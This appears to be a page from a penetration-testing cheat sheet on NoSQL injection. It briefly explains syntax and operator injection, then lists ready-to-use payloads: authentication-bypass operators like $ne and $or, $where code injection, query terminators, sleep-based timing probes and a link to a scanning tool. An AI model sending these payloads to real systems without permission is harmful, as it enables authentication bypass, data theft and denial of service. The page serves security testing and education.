💉NoSQL Injection

NoSQL Injection

NoSQL injection is a vulnerability where an attacker is able to interfere with the queries that an application makes to a NoSQL database. NoSQL injection may enable an attacker to:

Bypass authentication or protection mechanisms.
Extract or edit data.
Cause a denial of service.
Execute code on the server.

NoSQL databases store and retrieve data in a format other than traditional SQL relational tables. They use a wide range of query languages instead of a universal standard like SQL, and have fewer relational constraints.

There are two different types of NoSQL injection:

Syntax injection - This occurs when you can break the NoSQL query syntax, enabling you to inject your own payload. The methodology is similar to that used in SQL injection. However the nature of the attack varies significantly, as NoSQL databases use a range of query languages, types of query syntax, and different data structures.
Operator injection - This occurs when you can use NoSQL query operators to manipulate queries.

Where & How to Inject Payloads

1. site.com/page?query=term || '1'=='1
2. site.com/page?user[$ne]=nobody

Simple Error Based NoSQL Injection Tests

'"\/$[].>

Blind Boolean Injection

{"$ne": -1}
{"$in": []}
{"$and": [ {"id": 5}, {"id": 6} ]}
{"$where":  "return true"}
{"$or": [{},{"foo":"1"}]}
site.com/page?query=term || '1'=='1
site.com/page?user[$ne]=nobody
site.com/page?user=;return true

You may need to try appending certain characters to correctly terminate the query:

//
%00
'
"
some number of closing brackets or braces, in some combination

Timing Based Injection

{"$where":  "sleep(100)"}
;sleep(100);

Automated Tool

GitHub - Charlie-belmer/nosqli: NoSql Injection CLI tool, for finding vulnerable websites using MongoDB.GitHub

PreviousXSS and XSRF Together NextNoSQL Databases

Last updated 10 months ago